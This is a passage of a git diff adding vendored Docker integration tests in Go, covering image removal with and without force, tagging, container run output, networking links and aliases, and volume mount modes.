"busybox-one:tag2") + + imagesAfter, _ := dockerCmd(c, "images", "-a") + // tag busybox to create 2 more images with same imageID + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+2, check.Commentf("docker images shows: %q\n", imagesAfter)) + + imgID := inspectField(c, "busybox-one:tag1", "Id") + + // run a container with the image + out, _ = runSleepingContainerInImage(c, "busybox-one") + + containerID = strings.TrimSpace(out) + + // first checkout without force it fails + out, _, err := dockerCmdWithError("rmi", imgID) + expected := fmt.Sprintf("conflict: unable to delete %s (cannot be forced) - image is being used by running container %s", stringid.TruncateID(imgID), stringid.TruncateID(containerID)) + // rmi tagged in multiple repos should have failed without force + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, expected) + + dockerCmd(c, "stop", containerID) + dockerCmd(c, "rmi", "-f", imgID) + + imagesAfter, _ = dockerCmd(c, "images", "-a") + // rmi -f failed, image still exists + c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12], check.Commentf("ImageID:%q; ImagesAfter: %q", imgID, imagesAfter)) +} + +func (s *DockerSuite) TestRmiImgIDForce(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "mkdir '/busybox-test'") + + containerID := strings.TrimSpace(out) + + // Wait for it to exit as cannot commit a running container on Windows, and + // it will take a few seconds to exit + if daemonPlatform == "windows" { + err := waitExited(containerID, 60*time.Second) + c.Assert(err, check.IsNil) + } + + dockerCmd(c, "commit", containerID, "busybox-test") + + imagesBefore, _ := dockerCmd(c, "images", "-a") + dockerCmd(c, "tag", "busybox-test", "utest:tag1") + dockerCmd(c, "tag", "busybox-test", "utest:tag2") + dockerCmd(c, "tag", "busybox-test", "utest/docker:tag3") + dockerCmd(c, "tag", "busybox-test", "utest:5000/docker:tag4") + { + imagesAfter, _ := dockerCmd(c, 
"images", "-a") + c.Assert(strings.Count(imagesAfter, "\n"), checker.Equals, strings.Count(imagesBefore, "\n")+4, check.Commentf("before: %q\n\nafter: %q\n", imagesBefore, imagesAfter)) + } + imgID := inspectField(c, "busybox-test", "Id") + + // first checkout without force it fails + out, _, err := dockerCmdWithError("rmi", imgID) + // rmi tagged in multiple repos should have failed without force + c.Assert(err, checker.NotNil) + // rmi tagged in multiple repos should have failed without force + c.Assert(out, checker.Contains, "(must be forced) - image is referenced in multiple repositories", check.Commentf("out: %s; err: %v;", out, err)) + + dockerCmd(c, "rmi", "-f", imgID) + { + imagesAfter, _ := dockerCmd(c, "images", "-a") + // rmi failed, image still exists + c.Assert(imagesAfter, checker.Not(checker.Contains), imgID[:12]) + } +} + +// See https://github.com/docker/docker/issues/14116 +func (s *DockerSuite) TestRmiImageIDForceWithRunningContainersAndMultipleTags(c *check.C) { + dockerfile := "FROM busybox\nRUN echo test 14116\n" + imgID, err := buildImage("test-14116", dockerfile, false) + c.Assert(err, checker.IsNil) + + newTag := "newtag" + dockerCmd(c, "tag", imgID, newTag) + runSleepingContainerInImage(c, imgID) + + out, _, err := dockerCmdWithError("rmi", "-f", imgID) + // rmi -f should not delete image with running containers + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "(cannot be forced) - image is being used by running container") +} + +func (s *DockerSuite) TestRmiTagWithExistingContainers(c *check.C) { + container := "test-delete-tag" + newtag := "busybox:newtag" + bb := "busybox:latest" + dockerCmd(c, "tag", bb, newtag) + + dockerCmd(c, "run", "--name", container, bb, "/bin/true") + + out, _ := dockerCmd(c, "rmi", newtag) + c.Assert(strings.Count(out, "Untagged: "), checker.Equals, 1) +} + +func (s *DockerSuite) TestRmiForceWithExistingContainers(c *check.C) { + image := "busybox-clone" + + cmd := exec.Command(dockerBinary, 
"build", "--no-cache", "-t", image, "-") + cmd.Stdin = strings.NewReader(`FROM busybox +MAINTAINER foo`) + + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.IsNil, check.Commentf("Could not build %s: %s", image, out)) + + dockerCmd(c, "run", "--name", "test-force-rmi", image, "/bin/true") + + dockerCmd(c, "rmi", "-f", image) +} + +func (s *DockerSuite) TestRmiWithMultipleRepositories(c *check.C) { + newRepo := "127.0.0.1:5000/busybox" + oldRepo := "busybox" + newTag := "busybox:test" + dockerCmd(c, "tag", oldRepo, newRepo) + + dockerCmd(c, "run", "--name", "test", oldRepo, "touch", "/abcd") + + dockerCmd(c, "commit", "test", newTag) + + out, _ := dockerCmd(c, "rmi", newTag) + c.Assert(out, checker.Contains, "Untagged: "+newTag) +} + +func (s *DockerSuite) TestRmiForceWithMultipleRepositories(c *check.C) { + imageName := "rmiimage" + tag1 := imageName + ":tag1" + tag2 := imageName + ":tag2" + + _, err := buildImage(tag1, + `FROM busybox + MAINTAINER "docker"`, + true) + if err != nil { + c.Fatal(err) + } + + dockerCmd(c, "tag", tag1, tag2) + + out, _ := dockerCmd(c, "rmi", "-f", tag2) + c.Assert(out, checker.Contains, "Untagged: "+tag2) + c.Assert(out, checker.Not(checker.Contains), "Untagged: "+tag1) + + // Check built image still exists + images, _ := dockerCmd(c, "images", "-a") + c.Assert(images, checker.Contains, imageName, check.Commentf("Built image missing %q; Images: %q", imageName, images)) +} + +func (s *DockerSuite) TestRmiBlank(c *check.C) { + out, _, err := dockerCmdWithError("rmi", " ") + // Should have failed to delete ' ' image + c.Assert(err, checker.NotNil) + // Wrong error message generated + c.Assert(out, checker.Not(checker.Contains), "no such id", check.Commentf("out: %s", out)) + // Expected error message not generated + c.Assert(out, checker.Contains, "image name cannot be blank", check.Commentf("out: %s", out)) +} + +func (s *DockerSuite) TestRmiContainerImageNotFound(c *check.C) { + // Build 2 images for testing. 
+ imageNames := []string{"test1", "test2"} + imageIds := make([]string, 2) + for i, name := range imageNames { + dockerfile := fmt.Sprintf("FROM busybox\nMAINTAINER %s\nRUN echo %s\n", name, name) + id, err := buildImage(name, dockerfile, false) + c.Assert(err, checker.IsNil) + imageIds[i] = id + } + + // Create a long-running container. + runSleepingContainerInImage(c, imageNames[0]) + + // Create a stopped container, and then force remove its image. + dockerCmd(c, "run", imageNames[1], "true") + dockerCmd(c, "rmi", "-f", imageIds[1]) + + // Try to remove the image of the running container and see if it fails as expected. + out, _, err := dockerCmdWithError("rmi", "-f", imageIds[0]) + // The image of the running container should not be removed. + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "image is being used by running container", check.Commentf("out: %s", out)) +} + +// #13422 +func (s *DockerSuite) TestRmiUntagHistoryLayer(c *check.C) { + image := "tmp1" + // Build an image for testing. + dockerfile := `FROM busybox +MAINTAINER foo +RUN echo 0 #layer0 +RUN echo 1 #layer1 +RUN echo 2 #layer2 +` + _, err := buildImage(image, dockerfile, false) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "history", "-q", image) + ids := strings.Split(out, "\n") + idToTag := ids[2] + + // Tag layer0 to "tmp2". + newTag := "tmp2" + dockerCmd(c, "tag", idToTag, newTag) + // Create a container based on "tmp1". + dockerCmd(c, "run", "-d", image, "true") + + // See if the "tmp2" can be untagged. + out, _ = dockerCmd(c, "rmi", newTag) + // Expected 1 untagged entry + c.Assert(strings.Count(out, "Untagged: "), checker.Equals, 1, check.Commentf("out: %s", out)) + + // Now let's add the tag again and create a container based on it. + dockerCmd(c, "tag", idToTag, newTag) + out, _ = dockerCmd(c, "run", "-d", newTag, "true") + cid := strings.TrimSpace(out) + + // At this point we have 2 containers, one based on layer2 and another based on layer0. 
+ // Try to untag "tmp2" without the -f flag. + out, _, err = dockerCmdWithError("rmi", newTag) + // should not be untagged without the -f flag + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, cid[:12]) + c.Assert(out, checker.Contains, "(must force)") + + // Add the -f flag and test again. + out, _ = dockerCmd(c, "rmi", "-f", newTag) + // should be allowed to untag with the -f flag + c.Assert(out, checker.Contains, fmt.Sprintf("Untagged: %s:latest", newTag)) +} + +func (*DockerSuite) TestRmiParentImageFail(c *check.C) { + _, err := buildImage("test", ` + FROM busybox + RUN echo hello`, false) + c.Assert(err, checker.IsNil) + + id := inspectField(c, "busybox", "ID") + out, _, err := dockerCmdWithError("rmi", id) + c.Assert(err, check.NotNil) + if !strings.Contains(out, "image has dependent child images") { + c.Fatalf("rmi should have failed because it's a parent image, got %s", out) + } +} + +func (s *DockerSuite) TestRmiWithParentInUse(c *check.C) { + out, _ := dockerCmd(c, "create", "busybox") + cID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cID) + imageID := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "create", imageID) + cID = strings.TrimSpace(out) + + out, _ = dockerCmd(c, "commit", cID) + imageID = strings.TrimSpace(out) + + dockerCmd(c, "rmi", imageID) +} + +// #18873 +func (s *DockerSuite) TestRmiByIDHardConflict(c *check.C) { + dockerCmd(c, "create", "busybox") + + imgID := inspectField(c, "busybox:latest", "Id") + + _, _, err := dockerCmdWithError("rmi", imgID[:12]) + c.Assert(err, checker.NotNil) + + // check that tag was not removed + imgID2 := inspectField(c, "busybox:latest", "Id") + c.Assert(imgID, checker.Equals, imgID2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go new file mode 100644 index 0000000000..9462aef800 --- /dev/null +++ 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_run_test.go @@ -0,0 +1,4689 @@ +package main + +import ( + "bufio" + "bytes" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "os" + "os/exec" + "path" + "path/filepath" + "reflect" + "regexp" + "runtime" + "sort" + "strconv" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork/resolvconf" + "github.com/docker/libnetwork/types" + "github.com/go-check/check" + libcontainerUser "github.com/opencontainers/runc/libcontainer/user" +) + +// "test123" should be printed by docker run +func (s *DockerSuite) TestRunEchoStdout(c *check.C) { + out, _ := dockerCmd(c, "run", "busybox", "echo", "test123") + if out != "test123\n" { + c.Fatalf("container should've printed 'test123', got '%s'", out) + } +} + +// "test" should be printed +func (s *DockerSuite) TestRunEchoNamedContainer(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "testfoonamedcontainer", "busybox", "echo", "test") + if out != "test\n" { + c.Errorf("container should've printed 'test'") + } +} + +// docker run should not leak file descriptors. This test relies on Unix +// specific functionality and cannot run on Windows. 
+func (s *DockerSuite) TestRunLeakyFileDescriptors(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "busybox", "ls", "-C", "/proc/self/fd") + + // normally, we should only get 0, 1, and 2, but 3 gets created by "ls" when it does "opendir" on the "fd" directory + if out != "0 1 2 3\n" { + c.Errorf("container should've printed '0 1 2 3', not: %s", out) + } +} + +// it should be possible to lookup Google DNS +// this will fail when Internet access is unavailable +func (s *DockerSuite) TestRunLookupGoogleDNS(c *check.C) { + testRequires(c, Network, NotArm) + if daemonPlatform == "windows" { + // nslookup isn't present in Windows busybox. Is built-in. Further, + // nslookup isn't present in nanoserver. Hence just use PowerShell... + dockerCmd(c, "run", WindowsBaseImage, "powershell", "Resolve-DNSName", "google.com") + } else { + dockerCmd(c, "run", DefaultImage, "nslookup", "google.com") + } + +} + +// the exit code should be 0 +func (s *DockerSuite) TestRunExitCodeZero(c *check.C) { + dockerCmd(c, "run", "busybox", "true") +} + +// the exit code should be 1 +func (s *DockerSuite) TestRunExitCodeOne(c *check.C) { + _, exitCode, err := dockerCmdWithError("run", "busybox", "false") + c.Assert(err, checker.NotNil) + c.Assert(exitCode, checker.Equals, 1) +} + +// it should be possible to pipe in data via stdin to a process running in a container +func (s *DockerSuite) TestRunStdinPipe(c *check.C) { + // TODO Windows: This needs some work to make compatible. 
+ testRequires(c, DaemonIsLinux) + runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat") + runCmd.Stdin = strings.NewReader("blahblah") + out, _, _, err := runCommandWithStdoutStderr(runCmd) + if err != nil { + c.Fatalf("failed to run container: %v, output: %q", err, out) + } + + out = strings.TrimSpace(out) + dockerCmd(c, "wait", out) + + logsOut, _ := dockerCmd(c, "logs", out) + + containerLogs := strings.TrimSpace(logsOut) + if containerLogs != "blahblah" { + c.Errorf("logs didn't print the container's logs %s", containerLogs) + } + + dockerCmd(c, "rm", out) +} + +// the container's ID should be printed when starting a container in detached mode +func (s *DockerSuite) TestRunDetachedContainerIDPrinting(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "true") + + out = strings.TrimSpace(out) + dockerCmd(c, "wait", out) + + rmOut, _ := dockerCmd(c, "rm", out) + + rmOut = strings.TrimSpace(rmOut) + if rmOut != out { + c.Errorf("rm didn't print the container ID %s %s", out, rmOut) + } +} + +// the working directory should be set correctly +func (s *DockerSuite) TestRunWorkingDirectory(c *check.C) { + dir := "/root" + image := "busybox" + if daemonPlatform == "windows" { + dir = `C:/Windows` + } + + // First with -w + out, _ := dockerCmd(c, "run", "-w", dir, image, "pwd") + out = strings.TrimSpace(out) + if out != dir { + c.Errorf("-w failed to set working directory") + } + + // Then with --workdir + out, _ = dockerCmd(c, "run", "--workdir", dir, image, "pwd") + out = strings.TrimSpace(out) + if out != dir { + c.Errorf("--workdir failed to set working directory") + } +} + +// pinging Google's DNS resolver should fail when we disable the networking +func (s *DockerSuite) TestRunWithoutNetworking(c *check.C) { + count := "-c" + image := "busybox" + if daemonPlatform == "windows" { + count = "-n" + image = WindowsBaseImage + } + + // First using the long form --net + out, exitCode, err := dockerCmdWithError("run", "--net=none", 
image, "ping", count, "1", "8.8.8.8") + if err != nil && exitCode != 1 { + c.Fatal(out, err) + } + if exitCode != 1 { + c.Errorf("--net=none should've disabled the network; the container shouldn't have been able to ping 8.8.8.8") + } +} + +//test --link use container name to link target +func (s *DockerSuite) TestRunLinksContainerWithContainerName(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as the networking + // settings are not populated back yet on inspect. + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-i", "-t", "-d", "--name", "parent", "busybox") + + ip := inspectField(c, "parent", "NetworkSettings.Networks.bridge.IPAddress") + + out, _ := dockerCmd(c, "run", "--link", "parent:test", "busybox", "/bin/cat", "/etc/hosts") + if !strings.Contains(out, ip+" test") { + c.Fatalf("use a container name to link target failed") + } +} + +//test --link use container id to link target +func (s *DockerSuite) TestRunLinksContainerWithContainerID(c *check.C) { + // TODO Windows: This test cannot run on a Windows daemon as the networking + // settings are not populated back yet on inspect. 
+ testRequires(c, DaemonIsLinux) + cID, _ := dockerCmd(c, "run", "-i", "-t", "-d", "busybox") + + cID = strings.TrimSpace(cID) + ip := inspectField(c, cID, "NetworkSettings.Networks.bridge.IPAddress") + + out, _ := dockerCmd(c, "run", "--link", cID+":test", "busybox", "/bin/cat", "/etc/hosts") + if !strings.Contains(out, ip+" test") { + c.Fatalf("use a container id to link target failed") + } +} + +func (s *DockerSuite) TestUserDefinedNetworkLinks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "udlinkNet") + + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // run a container in user-defined network udlinkNet with a link for an existing container + // and a link for a container that doesn't exist + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=second", "--link=first:foo", + "--link=third:bar", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // ping to third and its alias must fail + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "third") + c.Assert(err, check.NotNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.NotNil) + + // start third container now + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=third", "busybox", "top") + c.Assert(waitRun("third"), check.IsNil) + + // ping to third and its alias must succeed now + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "third") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "bar") + c.Assert(err, check.IsNil) +} + +func (s 
*DockerSuite) TestUserDefinedNetworkLinksWithRestart(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "udlinkNet") + + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=first", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + dockerCmd(c, "run", "-d", "--net=udlinkNet", "--name=second", "--link=first:foo", + "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must succeed + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // Restart first container + dockerCmd(c, "restart", "first") + c.Assert(waitRun("first"), check.IsNil) + + // ping to first and its alias foo must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) + + // Restart second container + dockerCmd(c, "restart", "second") + c.Assert(waitRun("second"), check.IsNil) + + // ping to first and its alias foo must still succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo") + c.Assert(err, check.IsNil) +} + +func (s *DockerSuite) TestRunWithNetAliasOnDefaultNetworks(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + + defaults := []string{"bridge", "host", "none"} + for _, net := range defaults { + out, _, err := dockerCmdWithError("run", "-d", "--net", net, "--net-alias", "alias_"+net, "busybox", "top") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, runconfig.ErrUnsupportedNetworkAndAlias.Error()) + } +} + +func (s *DockerSuite) 
TestUserDefinedNetworkAlias(c *check.C) { + testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm) + dockerCmd(c, "network", "create", "-d", "bridge", "net1") + + cid1, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=first", "--net-alias=foo1", "--net-alias=foo2", "busybox", "top") + c.Assert(waitRun("first"), check.IsNil) + + // Check if default short-id alias is added automatically + id := strings.TrimSpace(cid1) + aliases := inspectField(c, id, "NetworkSettings.Networks.net1.Aliases") + c.Assert(aliases, checker.Contains, stringid.TruncateID(id)) + + cid2, _ := dockerCmd(c, "run", "-d", "--net=net1", "--name=second", "busybox", "top") + c.Assert(waitRun("second"), check.IsNil) + + // Check if default short-id alias is added automatically + id = strings.TrimSpace(cid2) + aliases = inspectField(c, id, "NetworkSettings.Networks.net1.Aliases") + c.Assert(aliases, checker.Contains, stringid.TruncateID(id)) + + // ping to first and its network-scoped aliases + _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo1") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo2") + c.Assert(err, check.IsNil) + // ping first container's short-id alias + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid1)) + c.Assert(err, check.IsNil) + + // Restart first container + dockerCmd(c, "restart", "first") + c.Assert(waitRun("first"), check.IsNil) + + // ping to first and its network-scoped aliases must succeed + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo1") + c.Assert(err, check.IsNil) + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "foo2") + c.Assert(err, check.IsNil) + // ping first container's 
short-id alias + _, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", stringid.TruncateID(cid1)) + c.Assert(err, check.IsNil) +} + +// Issue 9677. +func (s *DockerSuite) TestRunWithDaemonFlags(c *check.C) { + out, _, err := dockerCmdWithError("--exec-opt", "foo=bar", "run", "-i", "busybox", "true") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unknown flag: --exec-opt") +} + +// Regression test for #4979 +func (s *DockerSuite) TestRunWithVolumesFromExited(c *check.C) { + + var ( + out string + exitCode int + ) + + // Create a file in a volume + if daemonPlatform == "windows" { + out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", `c:\some\dir`, WindowsBaseImage, "cmd", "/c", `echo hello > c:\some\dir\file`) + } else { + out, exitCode = dockerCmd(c, "run", "--name", "test-data", "--volume", "/some/dir", "busybox", "touch", "/some/dir/file") + } + if exitCode != 0 { + c.Fatal("1", out, exitCode) + } + + // Read the file from another container using --volumes-from to access the volume in the second container + if daemonPlatform == "windows" { + out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", WindowsBaseImage, "cmd", "/c", `type c:\some\dir\file`) + } else { + out, exitCode = dockerCmd(c, "run", "--volumes-from", "test-data", "busybox", "cat", "/some/dir/file") + } + if exitCode != 0 { + c.Fatal("2", out, exitCode) + } +} + +// Volume path is a symlink which also exists on the host, and the host side is a file not a dir +// But the volume call is just a normal volume, not a bind mount +func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir(c *check.C) { + var ( + dockerFile string + containerPath string + cmd string + ) + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support symlinks inside a volume path + testRequires(c, SameHostDaemon, DaemonIsLinux) + name := "test-volume-symlink" + + dir, err := ioutil.TempDir("", name) + if err != nil { + 
c.Fatal(err) + } + defer os.RemoveAll(dir) + + // In the case of Windows to Windows CI, if the machine is setup so that + // the temp directory is not the C: drive, this test is invalid and will + // not work. + if daemonPlatform == "windows" && strings.ToLower(dir[:1]) != "c" { + c.Skip("Requires TEMP to point to C: drive") + } + + f, err := os.OpenFile(filepath.Join(dir, "test"), os.O_CREATE, 0700) + if err != nil { + c.Fatal(err) + } + f.Close() + + if daemonPlatform == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir %s\nRUN mklink /D c:\\test %s", WindowsBaseImage, dir, dir) + containerPath = `c:\test\test` + cmd = "tasklist" + } else { + dockerFile = fmt.Sprintf("FROM busybox\nRUN mkdir -p %s\nRUN ln -s %s /test", dir, dir) + containerPath = "/test/test" + cmd = "true" + } + if _, err := buildImage(name, dockerFile, false); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-v", containerPath, name, cmd) +} + +// Volume path is a symlink in the container +func (s *DockerSuite) TestRunCreateVolumesInSymlinkDir2(c *check.C) { + var ( + dockerFile string + containerPath string + cmd string + ) + // TODO Windows (Post TP5): This test cannot run on a Windows daemon as + // Windows does not support symlinks inside a volume path + testRequires(c, SameHostDaemon, DaemonIsLinux) + name := "test-volume-symlink2" + + if daemonPlatform == "windows" { + dockerFile = fmt.Sprintf("FROM %s\nRUN mkdir c:\\%s\nRUN mklink /D c:\\test c:\\%s", WindowsBaseImage, name, name) + containerPath = `c:\test\test` + cmd = "tasklist" + } else { + dockerFile = fmt.Sprintf("FROM busybox\nRUN mkdir -p /%s\nRUN ln -s /%s /test", name, name) + containerPath = "/test/test" + cmd = "true" + } + if _, err := buildImage(name, dockerFile, false); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-v", containerPath, name, cmd) +} + +func (s *DockerSuite) TestRunVolumesMountedAsReadonly(c *check.C) { + // TODO Windows: Temporary check - remove once TP5 support is dropped + if 
daemonPlatform == "windows" && windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + if _, code, err := dockerCmdWithError("run", "-v", "/test:/test:ro", "busybox", "touch", "/test/somefile"); err == nil || code == 0 { + c.Fatalf("run should fail because volume is ro: exit code %d", code) + } +} + +func (s *DockerSuite) TestRunVolumesFromInReadonlyModeFails(c *check.C) { + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform == "windows" && windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + var ( + volumeDir string + fileInVol string + ) + if daemonPlatform == "windows" { + volumeDir = `c:/test` // Forward-slash as using busybox + fileInVol = `c:/test/file` + } else { + testRequires(c, DaemonIsLinux) + volumeDir = "/test" + fileInVol = `/test/file` + } + dockerCmd(c, "run", "--name", "parent", "-v", volumeDir, "busybox", "true") + + if _, code, err := dockerCmdWithError("run", "--volumes-from", "parent:ro", "busybox", "touch", fileInVol); err == nil || code == 0 { + c.Fatalf("run should fail because volume is ro: exit code %d", code) + } +} + +// Regression test for #1201 +func (s *DockerSuite) TestRunVolumesFromInReadWriteMode(c *check.C) { + var ( + volumeDir string + fileInVol string + ) + if daemonPlatform == "windows" { + volumeDir = `c:/test` // Forward-slash as using busybox + fileInVol = `c:/test/file` + } else { + volumeDir = "/test" + fileInVol = "/test/file" + } + + dockerCmd(c, "run", "--name", "parent", "-v", volumeDir, "busybox", "true") + dockerCmd(c, "run", "--volumes-from", "parent:rw", "busybox", "touch", fileInVol) + + if out, _, err := dockerCmdWithError("run", "--volumes-from", "parent:bar", "busybox", "touch", fileInVol); err == nil || !strings.Contains(out, `invalid mode: bar`) { + c.Fatalf("running --volumes-from parent:bar should have failed with invalid mode: %q", out) + } + + dockerCmd(c, "run", "--volumes-from", "parent", "busybox", 
"touch", fileInVol) +} + +func (s *DockerSuite) TestVolumesFromGetsProperMode(c *check.C) { + testRequires(c, SameHostDaemon) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + hostpath := randomTmpDirPath("test", daemonPlatform) + if err := os.MkdirAll(hostpath, 0755); err != nil { + c.Fatalf("Failed to create %s: %q", hostpath, err) + } + defer os.RemoveAll(hostpath) + + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform == "windows" && windowsDaemonKV < 14350 { + c.Skip("Needs later Windows build for RO volumes") + } + dockerCmd(c, "run", "--name", "parent", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true") + + // Expect this "rw" mode to be be ignored since the inherited volume is "ro" + if _, _, err := dockerCmdWithError("run", "--volumes-from", "parent:rw", "busybox", "touch", prefix+slash+"test"+slash+"file"); err == nil { + c.Fatal("Expected volumes-from to inherit read-only volume even when passing in `rw`") + } + + dockerCmd(c, "run", "--name", "parent2", "-v", hostpath+":"+prefix+slash+"test:ro", "busybox", "true") + + // Expect this to be read-only since both are "ro" + if _, _, err := dockerCmdWithError("run", "--volumes-from", "parent2:ro", "busybox", "touch", prefix+slash+"test"+slash+"file"); err == nil { + c.Fatal("Expected volumes-from to inherit read-only volume even when passing in `ro`") + } +} + +// Test for GH#10618 +func (s *DockerSuite) TestRunNoDupVolumes(c *check.C) { + path1 := randomTmpDirPath("test1", daemonPlatform) + path2 := randomTmpDirPath("test2", daemonPlatform) + + someplace := ":/someplace" + if daemonPlatform == "windows" { + // Windows requires that the source directory exists before calling HCS + testRequires(c, SameHostDaemon) + someplace = `:c:\someplace` + if err := os.MkdirAll(path1, 0755); err != nil { + c.Fatalf("Failed to create %s: %q", path1, err) + } + defer os.RemoveAll(path1) + if err := os.MkdirAll(path2, 0755); err != nil { + c.Fatalf("Failed to create 
%s: %q", path1, err) + } + defer os.RemoveAll(path2) + } + mountstr1 := path1 + someplace + mountstr2 := path2 + someplace + + if out, _, err := dockerCmdWithError("run", "-v", mountstr1, "-v", mountstr2, "busybox", "true"); err == nil { + c.Fatal("Expected error about duplicate mount definitions") + } else { + if !strings.Contains(out, "Duplicate mount point") { + c.Fatalf("Expected 'duplicate mount point' error, got %v", out) + } + } + + // Test for https://github.com/docker/docker/issues/22093 + volumename1 := "test1" + volumename2 := "test2" + volume1 := volumename1 + someplace + volume2 := volumename2 + someplace + if out, _, err := dockerCmdWithError("run", "-v", volume1, "-v", volume2, "busybox", "true"); err == nil { + c.Fatal("Expected error about duplicate mount definitions") + } else { + if !strings.Contains(out, "Duplicate mount point") { + c.Fatalf("Expected 'duplicate mount point' error, got %v", out) + } + } + // create failed should have create volume volumename1 or volumename2 + // we should remove volumename2 or volumename2 successfully + out, _ := dockerCmd(c, "volume", "ls") + if strings.Contains(out, volumename1) { + dockerCmd(c, "volume", "rm", volumename1) + } else { + dockerCmd(c, "volume", "rm", volumename2) + } +} + +// Test for #1351 +func (s *DockerSuite) TestRunApplyVolumesFromBeforeVolumes(c *check.C) { + prefix := "" + if daemonPlatform == "windows" { + prefix = `c:` + } + dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") + dockerCmd(c, "run", "--volumes-from", "parent", "-v", prefix+"/test", "busybox", "cat", prefix+"/test/foo") +} + +func (s *DockerSuite) TestRunMultipleVolumesFrom(c *check.C) { + prefix := "" + if daemonPlatform == "windows" { + prefix = `c:` + } + dockerCmd(c, "run", "--name", "parent1", "-v", prefix+"/test", "busybox", "touch", prefix+"/test/foo") + dockerCmd(c, "run", "--name", "parent2", "-v", prefix+"/other", "busybox", "touch", prefix+"/other/bar") + 
